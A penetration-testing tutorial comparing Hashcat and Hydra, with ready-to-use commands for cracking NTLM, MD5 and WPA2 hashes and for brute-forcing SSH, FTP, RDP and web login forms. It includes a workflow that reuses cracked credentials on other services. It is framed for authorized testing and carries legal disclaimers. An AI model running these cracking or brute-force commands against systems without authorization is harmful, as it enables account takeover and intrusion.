Last updated: March 2026
Hashcat vs Hydra: Which Password Tool Should You Use? (2026)
Hashcat and Hydra solve different problems: Hashcat cracks captured password hashes offline at GPU speeds (billions of attempts per second), while Hydra brute-forces live login services online (limited by network speed and rate limits). Use Hashcat when you have a hash dump; use Hydra when you have only a login form and no captured hash.
Legal disclaimer: Only use these tools on systems you own or have explicit written authorization to test. Unauthorized access is illegal under the CFAA and equivalent laws worldwide.
Quick Comparison Table
| Feature | Hashcat | Hydra |
|---|---|---|
| Attack type | Offline (hash cracking) | Online (live service) |
| Requires live target | No | Yes |
| Speed | Billions/sec (GPU) | Hundreds/sec (network-limited) |
| GPU acceleration | Yes (CUDA/OpenCL) | No |
| Target examples | Hash dumps, .cap files, SAM DB |
SSH, FTP, HTTP forms, RDP, SMB |
| Risk of detection | None (no network traffic) | High (login attempts are logged) |
| Account lockout risk | None | Yes — can trigger lockouts |
| Typical use case | Post-exploitation hash cracking | Service enumeration, testing |
When to Use Hashcat
Choose Hashcat when you have a captured hash and need to recover the plaintext password without touching the target system again.
Common scenarios:
- You dumped /etc/shadow from a compromised Linux machine
- You extracted NTLM hashes from a Windows SAM database or Active Directory via secretsdump
- You captured a WPA2 four-way handshake with airodump-ng
- You found MD5/SHA hashes in a database dump from a SQL injection
- You extracted Kerberos TGS tickets during Kerberoasting (-m 13100)
Hashcat never generates network traffic to the target. It runs entirely on your local GPU, making it undetectable to the target system's IDS or SIEM.
Hashcat Basic Examples
# Crack MD5 hash from a database dump
hashcat -m 0 -a 0 5f4dcc3b5aa765d61d8327deb882cf99 /usr/share/wordlists/rockyou.txt
# Crack NTLM hashes (Windows Active Directory)
hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
# Crack WPA2 handshake
hashcat -m 22000 -a 0 capture.hc22000 /usr/share/wordlists/rockyou.txt
# Add rules for better coverage
hashcat -m 1000 -a 0 -r /usr/share/hashcat/rules/best64.rule ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
See the full Hashcat Wordlist Attack Tutorial for detailed usage.
When to Use Hydra
Choose Hydra when you have access to a live service with a login prompt but no captured hash to crack offline.
Common scenarios: - Testing default credentials on network devices (routers, switches, cameras) - Validating password strength on an SSH server you administer - Testing a web application login form for weak passwords - Brute-forcing FTP/SMTP credentials during a penetration test - Testing RDP authentication on Windows servers
Important considerations with online attacks: - Most services log failed login attempts - Many services implement rate limiting or temporary lockouts - Account lockout policies can lock out real users — confirm policy before testing - Network speed caps maximum attempts per second, regardless of your hardware
Hydra Supported Protocols
Hydra supports 50+ protocols. Common ones:
ssh, ftp, http-get, http-post-form, https-post-form,
rdp, smb, smtp, pop3, imap, mysql, mssql, postgresql,
telnet, vnc, ldap2, ldap3, snmp, teamspeak, cisco
Hydra Syntax and Examples
Basic Syntax
hydra [options] <target> <protocol>
Key flags:
- -l <user> — Single username
- -L <file> — Username list file
- -p <pass> — Single password
- -P <file> — Password list file
- -t <n> — Parallel connections (default: 16)
- -s <port> — Custom port
- -v — Verbose output
- -V — Very verbose (show each attempt)
- -f — Stop after first successful crack
SSH Brute-Force
# Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# Username list + password list
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# Custom port, 4 threads
hydra -l root -P passwords.txt -t 4 -s 2222 ssh://192.168.1.100
Expected output when a password is found:
Hydra v9.5 (c) 2023 by van Hauser/THC
[DATA] max 16 tasks per 1 server
[DATA] attacking ssh://192.168.1.100:22/
[22][ssh] host: 192.168.1.100 login: admin password: password123
1 of 1 target successfully completed, 1 valid password found
FTP Brute-Force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.100
# With verbose output to see attempts
hydra -l admin -P /usr/share/wordlists/rockyou.txt -v ftp://192.168.1.100
HTTP POST Form (Web Login)
This is Hydra's most flexible mode. You need to identify three things: 1. The login URL path 2. The POST parameters (username and password field names) 3. A string that appears on a failed login page
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 \
http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid credentials"
Format: <path>:<post_params>:<failure_string>
^USER^— Hydra substitutes the username here^PASS^— Hydra substitutes the password here- The final field is a string found ONLY on failed login pages
For HTTPS targets:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 \
https-post-form "/login:username=^USER^&password=^PASS^:Login failed"
HTTP Basic Authentication
hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://192.168.1.100/admin
RDP (Windows Remote Desktop)
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.100 -t 1
Use -t 1 for RDP — it only accepts one connection at a time and will reject parallel attempts.
Hybrid Attacks: Combining Both Tools
In real engagements, Hashcat and Hydra are often used together in a workflow:
Workflow 1: Credential Stuffing from a Hash Dump
# Step 1: Crack hashes with Hashcat
hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
# Step 2: Extract username:password pairs
cat cracked.txt
# admin:Password1
# jsmith:Summer2024!
# Step 3: Test cracked credentials on other services with Hydra
hydra -C cracked.txt ssh://10.10.10.50
The -C flag takes a user:pass file directly.
Workflow 2: WPA2 Cracking + Network Access
# Step 1: Capture WPA2 handshake (airodump-ng)
# Step 2: Crack with Hashcat
hashcat -m 22000 -a 0 capture.hc22000 /usr/share/wordlists/rockyou.txt
# Step 3: Once on the network, use Hydra against discovered services
hydra -L users.txt -P passwords.txt ssh://192.168.0.10
Speed Comparison
| Tool | Protocol | Speed | Hardware |
|---|---|---|---|
| Hashcat | MD5 | 164 GH/s | RTX 4090 |
| Hashcat | NTLM | 288 GH/s | RTX 4090 |
| Hashcat | WPA2 | 2,600 kH/s | RTX 4090 |
| Hydra | SSH | ~10-50/sec | Any (network-limited) |
| Hydra | HTTP | ~100-500/sec | Any (network-limited) |
| Hydra | FTP | ~50-200/sec | Any (service-limited) |
The speed difference is enormous. Against a 14.3 million password wordlist, Hashcat (MD5) finishes in under 1 millisecond. Hydra against SSH at 50 attempts/sec would take 80+ hours to exhaust the same list.
FAQ
Q: Can I use Hydra on any website's login page? A: Only on systems you own or have written authorization to test. Web applications commonly deploy CAPTCHA, rate limiting, and lockout policies that will block automated tools. Attempting unauthorized access is illegal.
Q: Is Hashcat faster than John the Ripper? A: Yes, significantly. Hashcat leverages GPU compute (CUDA/OpenCL), while John the Ripper primarily uses CPU. On an RTX 4090, Hashcat achieves ~164 GH/s on MD5 vs John's ~10-20 GH/s on CPU. John's advantage is automatic hash format detection and ease of use.
Q: Does Hydra support two-factor authentication? A: No. Hydra cannot handle 2FA challenges. If a service requires a TOTP or push notification, Hydra will fail at that step. This is why enabling 2FA on internet-facing services effectively neutralizes most online brute-force attacks.
Q: Which tool should a beginner start with?
A: Start with Hashcat using a CTF hash or a local hash you created yourself. The offline nature means no risk of impacting real systems. Use echo -n "password" | md5sum to create a test hash, then crack it with hashcat -m 0 -a 0.